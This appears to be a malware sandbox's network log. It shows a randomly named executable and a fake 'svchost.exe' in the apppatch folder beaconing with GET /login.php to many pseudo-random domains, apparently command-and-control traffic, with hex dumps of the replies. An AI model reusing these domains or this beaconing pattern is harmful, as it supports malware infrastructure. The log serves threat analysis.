Host: puzylyp.com
Nov 11, 2024 18:51:34.292500973 CET | 166 | IN | HTTP/1.1 308 Permanent Redirect
Connection: close
Location: https://puzylyp.com/login.php
Server: Caddy
Date: Mon, 11 Nov 2024 17:51:34 GMT
Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
121 | 192.168.2.6 | 59238 | 178.162.203.226 | 80 | 1476 | C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:51:33.649336100 CET | 243 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: gatyfus.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
122 | 192.168.2.6 | 59239 | 188.114.96.3 | 80 | 1476 | C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:51:33.651628971 CET | 243 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qegyhig.com
Nov 11, 2024 18:51:34.334598064 CET | 968 | IN | HTTP/1.1 301 Moved Permanently
Date: Mon, 11 Nov 2024 17:51:34 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Location: https://qegyhig.com/login.php
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rbXXkMqCAWLDknBr9LMBigOBdtNtAT9Mj0QW0o6IsYf3AyPK7zuk4il1%2FP5ka3TZm%2BWVGtjDumgDMf7P9R1HEcia8xLK%2FWOrXqUv4oWTwIl9a9k090ijAF37ndsAiQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e10218d9e0d424b-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1205&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=243&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
123 | 192.168.2.6 | 59241 | 3.94.10.34 | 80 | 1476 | C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:51:33.699893951 CET | 352 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lymyxid.com
Cookie: snkz=66.23.206.109; btst=3f95d6b3439c1d0f64626ac83ec297f1|66.23.206.109|1731347479|1731347428|9|4|0
Nov 11, 2024 18:51:34.292635918 CET | 335 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 11 Nov 2024 17:51:34 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=3f95d6b3439c1d0f64626ac83ec297f1|66.23.206.109|1731347494|1731347428|12|5|0; path=/; domain=.lymyxid.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
124 | 192.168.2.6 | 59240 | 199.191.50.83 | 80 | 1476 | C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:51:33.719090939 CET | 281 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: galyqaz.com
Cookie: vsid=903vr478893028933998491
Nov 11, 2024 18:51:36.199882984 CET | 1236 | IN | HTTP/1.1 200 OK
Date: Mon, 11 Nov 2024 17:51:34 GMT
Server: Apache
Referrer-Policy: no-referrer-when-downgrade
Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_NHOnw0G73BscnvIcyf8HaXYxUwB52N5y4R2rV77ldfg6F/P3HTMIgnr4aIPWR/fyPGslgb3huQzNdSH/7sK+hw==
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.200737953 CET1236INData Raw: 5b 32 5d 3a 6e 75 6c 6c 3b 69 66 28 67 3d 3d 3d 22 70 69 6e 67 22 29 7b 72 65 74 75 72 6e 20 77 69 6e 64 6f 77 2e 63 6d 70 5f 67 70 70 5f 70 69 6e 67 28 29 7d 65 6c 73 65 7b 69 66 28 67 3d 3d 3d 22 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72
                                                                                                                                                                                                                  Data Ascii: [2]:null;if(g==="ping"){return window.cmp_gpp_ping()}else{if(g==="addEventListener"){__gpp.e=__gpp.e||[];if(!("lastId" in __gpp)){__gpp.lastId=0}__gpp.lastId++;var c=__gpp.lastId;__gpp.e.push({id:c,callback:f});return{eventName:"listenerRegist
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.200750113 CET1236INData Raw: 6c 3b 77 69 6e 64 6f 77 2e 5f 5f 75 73 70 61 70 69 28 62 2e 63 6f 6d 6d 61 6e 64 2c 62 2e 76 65 72 73 69 6f 6e 2c 66 75 6e 63 74 69 6f 6e 28 68 2c 67 29 7b 76 61 72 20 65 3d 7b 5f 5f 75 73 70 61 70 69 52 65 74 75 72 6e 3a 7b 72 65 74 75 72 6e 56
                                                                                                                                                                                                                  Data Ascii: l;window.__uspapi(b.command,b.version,function(h,g){var e={__uspapiReturn:{returnValue:h,success:g,callId:b.callId}};d.source.postMessage(a?JSON.stringify(e):e,"*")})}if(typeof(c)==="object"&&c!==null&&"__tcfapiCall" in c){var b=c.__tcfapiCall
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.200762987 CET1074INData Raw: 6d 73 67 68 61 6e 64 6c 65 72 3b 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6d 65 73 73 61 67 65 22 2c 77 69 6e 64 6f 77 2e 63 6d 70 5f 6d 73 67 68 61 6e 64 6c 65 72 2c 66 61 6c 73 65 29 7d 7d 3b 77 69 6e 64 6f 77
                                                                                                                                                                                                                  Data Ascii: msghandler;window.addEventListener("message",window.cmp_msghandler,false)}};window.cmp_addFrame("__cmpLocator");if(!("cmp_disableusp" in window)||!window.cmp_disableusp){window.cmp_addFrame("__uspapiLocator")}if(!("cmp_disabletcf" in window)||
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.205306053 CET1236INData Raw: 78 22 3b 69 6d 67 6c 6f 67 2e 73 72 63 3d 22 68 74 74 70 3a 2f 2f 67 61 6c 79 71 61 7a 2e 63 6f 6d 2f 73 6b 2d 6c 6f 67 61 62 70 73 74 61 74 75 73 2e 70 68 70 3f 61 3d 64 44 5a 77 63 7a 68 4b 5a 6a 5a 32 4e 69 73 34 51 30 56 6a 51 6c 4a 44 4e 7a
                                                                                                                                                                                                                  Data Ascii: x";imglog.src="http://galyqaz.com/sk-logabpstatus.php?a=dDZwczhKZjZ2Nis4Q0VjQlJDNzBLSlp6NER5cVFTSU9WOGNPL2tYQzREdE51Z2NTYjNQTGpwd3R0czl5OVVMdHc2YXRrOXU4OXRBaWJnVmRFRERUWWthV2t1eUx5a3RTVVg0cmllWS82RG53YkVmRTBVOE1NNUNNN0txN3lWREw=&b="+abp;docume


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
125         192.168.2.6  59250        91.195.240.19   80                1476  C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
Timestamp                            Bytes transferred  Direction  Data
Nov 11, 2024 18:51:34.912707090 CET  271                OUT        GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: www.gahyqah.com
                                                                                                                                                                                                                  Connection: Keep-Alive
Nov 11, 2024 18:51:35.818945885 CET  1236               IN         HTTP/1.1 200 OK
                                                                                                                                                                                                                  date: Mon, 11 Nov 2024 17:51:35 GMT
                                                                                                                                                                                                                  content-type: text/html; charset=UTF-8
                                                                                                                                                                                                                  transfer-encoding: chunked
                                                                                                                                                                                                                  vary: Accept-Encoding
                                                                                                                                                                                                                  expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                  cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                  pragma: no-cache
                                                                                                                                                                                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_g5rlXs9RuRW4dglqQ5LydJEttSTVBsfpTg5YbTbTgxQyCxJaX/4wWztIAOuRl2yVYhX0WGF1Yaew3U85nGI5uA==
                                                                                                                                                                                                                  last-modified: Mon, 11 Nov 2024 17:51:35 GMT
                                                                                                                                                                                                                  x-cache-miss-from: parking-7596689c44-bsx5j
                                                                                                                                                                                                                  server: Parking/1.0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.6  49730        188.114.96.3    443               1112  C:\Windows\apppatch\svchost.exe
Timestamp                Bytes transferred  Direction  Data
2024-11-11 17:50:30 UTC  267                OUT        GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: qegyhig.com
                                                                                                                                                                                                                  Connection: Keep-Alive
2024-11-11 17:50:31 UTC  949                IN         HTTP/1.1 404 Not Found
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:31 GMT
                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  vary: Accept-Encoding
                                                                                                                                                                                                                  expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                                  link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gYjD5X74qOdEklGm2TgwYtT9bq3EWWb4BCvF%2BnRchogNHSdhej9pB9Jh7ta%2BlMADXqtrDCASSTwrTGGp0%2Bf8aHA8x%2BwFzghe9jQApzVRlgsHMHyGWtBLbPHo0J5cqw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                  CF-RAY: 8e1020009fd00f95-EWR
                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1119&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2823&recv_bytes=881&delivery_rate=2549295&cwnd=250&unsent_bytes=0&cid=8cc85f375c19aca7&ts=897&x=0"
                                                                                                                                                                                                                  Data Ascii: "!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.pa
                                                                                                                                                                                                                  2024-11-11 17:50:31 UTC1369INData Raw: 6e 63 61 74 65 6d 6f 6a 69 3f 74 28 65 2e 63 6f 6e 63 61 74 65 6d 6f 6a 69 29 3a 65 2e 77 70 65 6d 6f 6a 69 26 26 65 2e 74 77 65 6d 6f 6a 69 26 26 28 74 28 65 2e 74 77 65 6d 6f 6a 69 29 2c 74 28 65 2e 77 70 65 6d 6f 6a 69 29 29 29 7d 29 29 7d 28 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 2c 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 61 73 74 72 61 2d 74 68 65 6d 65 2d 63 73 73 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 71 65 67 79 68 69 67 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 61 73 74 72 61 2f 61 73 73 65 74 73 2f 63 73 73 2f 6d 69 6e 69 66 69 65 64 2f 6d
                                                                                                                                                                                                                  Data Ascii: ncatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);</script><link rel='stylesheet' id='astra-theme-css-css' href='https://qegyhig.com/wp-content/themes/astra/assets/css/minified/m
                                                                                                                                                                                                                  2024-11-11 17:50:31 UTC1369INData Raw: 2d 64 65 73 63 72 69 70 74 69 6f 6e 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 39 33 37 35 72 65 6d 3b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 7d 2e 65 6e 74 72 79 2d 74 69 74 6c 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 36 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 36 32 35 72 65 6d 3b 7d 68 31 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 34 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 65 6d 3b 7d 68 32 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 32 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 72 65 6d 3b 66 6f 6e 74 2d 77
                                                                                                                                                                                                                  Data Ascii: -description{font-size:15px;font-size:0.9375rem;display:none;}.entry-title{font-size:26px;font-size:1.625rem;}h1,.entry-content h1{font-size:40px;font-size:2.5rem;font-weight:600;line-height:1.4em;}h2,.entry-content h2{font-size:32px;font-size:2rem;font-w
                                                                                                                                                                                                                  2024-11-11 17:50:31 UTC1369INData Raw: 77 65 62 6b 69 74 2d 73 6c 69 64 65 72 2d 74 68 75 6d 62 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 7d 2e 73 69 74 65 2d 66 6f 6f 74 65 72 20 61 3a 68 6f 76 65 72 20 2b 20 2e 70 6f 73 74 2d 63 6f 75 6e 74 2c 2e 73 69 74 65 2d 66 6f 6f 74 65 72 20 61 3a 66 6f 63 75 73 20 2b 20 2e 70 6f 73 74 2d 63 6f 75 6e 74 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 64 31 30 34 30 34 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 7d 2e 73 69 6e 67 6c 65 20 2e 6e 61 76 2d 6c 69 6e 6b 73 20 2e 6e 61 76 2d 70 72 65 76 69 6f 75 73 2c 2e 73 69 6e 67 6c 65 20 2e 6e 61 76 2d 6c 69 6e 6b 73 20 2e 6e 61 76 2d 6e 65 78 74
                                                                                                                                                                                                                  Data Ascii: webkit-slider-thumb{border-color:#d10404;background-color:#d10404;box-shadow:none;}.site-footer a:hover + .post-count,.site-footer a:focus + .post-count{background:#d10404;border-color:#d10404;}.single .nav-links .nav-previous,.single .nav-links .nav-next
                                                                                                                                                                                                                  2024-11-11 17:50:31 UTC1369INData Raw: 6e 74 20 2e 75 61 67 62 2d 69 66 62 2d 63 74 61 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 77 70 2d 62 6c 6f 63 6b 2d 75 61 67 62 2d 62 75 74 74 6f 6e 73 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 62 62 2d 6d 6f 64 75 6c 65 2d 63 6f 6e 74 65 6e 74 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 70 6f 73 74 2d 67 72 69 64 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 74 69 6d 65 6c 69 6e 65 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63
                                                                                                                                                                                                                  Data Ascii: nt .uagb-ifb-cta a,.ast-single-post .entry-content .wp-block-uagb-buttons a,.ast-single-post .entry-content .uabb-module-content a,.ast-single-post .entry-content .uagb-post-grid a,.ast-single-post .entry-content .uagb-timeline a,.ast-single-post .entry-c
                                                                                                                                                                                                                  2024-11-11 17:50:31 UTC1369INData Raw: 65 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6a 73 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6d 69 6e 69 2d 63 61 72 74 2d 69 74 65 6d 20 61 2e 72 65 6d 6f 76 65 3a 66 6f 63 75 73 2d 76 69 73 69 62 6c 65 7b 6f 75 74 6c 69 6e 65 2d 73 74 79 6c 65 3a 64 6f 74 74 65 64 3b 6f 75 74 6c 69 6e 65 2d 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 6f 75 74 6c 69 6e 65 2d 77 69 64 74 68 3a 74 68 69 6e 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 7d 69 6e 70 75 74 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 74 65 78 74 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 65 6d 61 69 6c 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 75 72 6c 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d
                                                                                                                                                                                                                  Data Ascii: e,.woocommerce-js .woocommerce-mini-cart-item a.remove:focus-visible{outline-style:dotted;outline-color:inherit;outline-width:thin;border-color:transparent;}input:focus,input[type="text"]:focus,input[type="email"]:focus,input[type="url"]:focus,input[type=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49732 | 188.114.96.3 | 443 | 1112 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-11 17:50:32 UTC | 267 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: qegyhig.com
                                                                                                                                                                                                                  Connection: Keep-Alive
2024-11-11 17:50:32 UTC | 945 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:32 GMT
                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  vary: Accept-Encoding
                                                                                                                                                                                                                  expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                                  link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HRVNe6t4Qu6vdEtL9iwI%2BQ1Q38bvr0S%2Bv7SeBZB9zTXz4KJzwfFHZND8kpGfk0doOnoX1lA1F5sAk9S79muVGFJPatHNbuURxpyCaJLrFeoZIKNHo3JcN462fT2Ntw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                  CF-RAY: 8e10200b0f551a28-EWR
                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2123&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2823&recv_bytes=881&delivery_rate=1326614&cwnd=230&unsent_bytes=0&cid=7d3700a79224c917&ts=888&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 49748 | 188.114.97.3 | 443 | 1112 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-11 17:50:34 UTC | 267 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: lysyvan.com
                                                                                                                                                                                                                  Connection: Keep-Alive
2024-11-11 17:50:36 UTC | 1092 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:36 GMT
                                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  vary: Accept-Encoding
                                                                                                                                                                                                                  expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                                  link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                                  server-timing: amp_sanitizer;dur="39.3",amp_style_sanitizer;dur="18.5",amp_tag_and_attribute_sanitizer;dur="16.7",amp_optimizer;dur="21.6"
                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BvAc3iPRlLdr3uhZ2%2B1cfZPRivLkQeAxlEmKxJWFQmmy7W987mmoH8zUQTxvPcbYa1OeumM058V%2FYP77tcjNj%2Bq1dE%2FDyp8%2FCdgu1fuOZGTpa4mW0LqTZYgfRHLLXw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                  CF-RAY: 8e10201c79c5c470-EWR
                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1080&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2827&recv_bytes=881&delivery_rate=2592658&cwnd=251&unsent_bytes=0&cid=edb2ecceb2d1bc0a&ts=1388&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.6 | 49770 | 188.114.97.3 | 443 | 1112 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-11 17:50:37 UTC | 267 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: lysyvan.com
                                                                                                                                                                                                                  Connection: Keep-Alive
2024-11-11 17:50:38 UTC | 1096 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:38 GMT
                                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  vary: Accept-Encoding
                                                                                                                                                                                                                  expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                                  link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                                  server-timing: amp_sanitizer;dur="45.8",amp_style_sanitizer;dur="18.6",amp_tag_and_attribute_sanitizer;dur="21.3",amp_optimizer;dur="19.7"
                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BKoFbtd2QxUv1zO9bYiKeRCTkKH2L7p3ZhRGl0rXNi%2FQ%2FXulD5iSPj5r%2Bj2Z0%2BKk%2FI3bw%2FHUeuyaiPjCVTKAg3Z7RksY4lz8CPZZOR1rHqdd4Utbu%2FR1h5SbEZHvEw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                  CF-RAY: 8e102029ddc80f7d-EWR
                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1265&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2827&recv_bytes=881&delivery_rate=2260733&cwnd=251&unsent_bytes=0&cid=b9c91602b0989451&ts=1592&x=0"
                                                                                                                                                                                                                  Data Ascii: t;bottom:0!important;z-index:1}amp-img[i-amphtml-ssr]:not(.i-amphtml-element)>[placeholder]{z-index:auto}.i-amphtml-notbuilt>[placeholder]{display:block!important}.i-amphtml-hidden-by-media-query{display:none!important}.i-amphtml-element-error{background:


